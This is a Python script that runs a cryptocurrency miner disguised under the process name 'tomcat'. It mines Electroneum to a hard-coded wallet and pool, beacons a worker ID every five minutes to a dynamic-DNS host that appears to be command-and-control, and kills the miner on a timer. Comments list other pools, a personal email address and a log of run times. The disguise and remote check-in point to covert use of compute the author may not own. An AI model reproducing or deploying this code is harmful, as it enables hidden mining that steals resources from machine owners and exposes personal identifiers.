import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:07.304790
#2018-02-17 16:53:05.109446
#2018-02-17 18:42:08.006254
#2018-02-17 20:32:05.947908
#2018-02-17 22:18:05.697397
#2018-02-18 00:02:03.655536
#2018-02-18 01:53:03.999455
#2018-02-18 03:41:02.147960
#2018-02-18 05:28:05.183021
#2018-02-18 07:19:07.346978
#2018-02-18 09:06:06.957052
#2018-02-18 10:52:01.742824
#2018-02-18 12:39:05.984073
#2018-02-18 14:26:01.477256
#2018-02-18 16:16:04.395983
#2018-02-18 18:04:07.337631
#2018-02-18 19:51:04.858843
#2018-02-18 21:39:05.140074
#2018-02-18 23:27:03.684972
#2018-02-19 01:14:07.726361
#2018-02-19 03:02:06.306549
#2018-02-19 04:49:05.417369
#2018-02-19 06:33:01.472699
#2018-02-19 08:22:05.739514
#2018-02-19 10:12:07.463041
#2018-02-19 12:01:08.189610
#2018-02-19 13:49:07.911494
#2018-02-19 15:39:01.919354
#2018-02-19 17:25:01.763296
#2018-02-19 19:12:04.681162
#2018-02-19 20:59:08.024153
#2018-02-19 22:47:06.155253
#2018-02-20 00:32:02.228734
#2018-02-20 02:19:08.068440
#2018-02-20 04:10:07.217563
#2018-02-20 05:53:04.938436
#2018-02-20 07:39:06.777732
#2018-02-20 09:24:04.192019
#2018-02-20 11:08:06.680590
#2018-02-20 12:55:04.878825
#2018-02-20 14:39:07.335773
#2018-02-20 16:25:03.063333
#2018-02-20 18:11:05.964807
#2018-02-20 20:02:07.267925
#2018-02-20 21:50:09.733676
#2018-02-20 23:32:06.352071
#2018-02-21 01:17:05.207727
#2018-02-21 03:05:06.474809
#2018-02-21 04:52:01.805916
#2018-02-21 06:39:10.262136
#2018-02-21 08:26:05.466178
#2018-02-21 10:11:07.356800
#2018-02-21 11:59:08.291412
#2018-02-21 13:49:04.753868
#2018-02-21 15:27:07.849506
#2018-02-21 17:18:10.866004
#2018-02-21 19:05:08.857288
#2018-02-21 20:53:07.177053
#2018-02-21 22:38:06.575468
#2018-02-22 00:26:08.665388
#2018-02-22 02:13:01.376199
#2018-02-22 03:58:07.592556
#2018-02-22 05:45:05.470593
#2018-02-22 07:32:05.576286
#2018-02-22 09:19:06.531877
#2018-02-22 11:06:08.435045
#2018-02-22 12:53:08.402171
#2018-02-22 14:39:07.040074
#2018-02-22 16:25:04.944445
#2018-02-22 18:12:14.446707
#2018-02-22 20:01:06.453929
#2018-02-22 21:51:01.808196
#2018-02-22 23:39:16.146254
#2018-02-23 01:26:06.952883
#2018-02-23 03:12:01.486754
#2018-02-23 05:01:01.791487
#2018-02-23 06:46:06.011949
#2018-02-23 08:39:03.837700
#2018-02-23 10:54:07.290513
#2018-02-23 12:51:07.134941
#2018-02-23 14:35:08.101775
#2018-02-23 16:24:04.815149
#2018-02-23 18:12:07.466433
#2018-02-23 19:57:01.870540
#2018-02-23 21:40:10.274859
#2018-02-23 23:29:04.133635
#2018-02-24 01:20:03.172966
#2018-02-24 03:12:03.075856
#2018-02-24 04:57:02.272162
#2018-02-24 06:44:01.504329
#2018-02-24 08:41:05.301130
#2018-02-24 10:25:01.752921
#2018-02-24 12:20:03.681830
#2018-02-24 14:13:06.153485
#2018-02-24 16:00:01.509106
#2018-02-24 17:52:05.052573
#2018-02-24 19:39:07.332872
#2018-02-24 21:26:05.617577
#2018-02-25 00:08:05.129260
#2018-02-25 03:20:03.758168
#2018-02-25 07:02:07.190569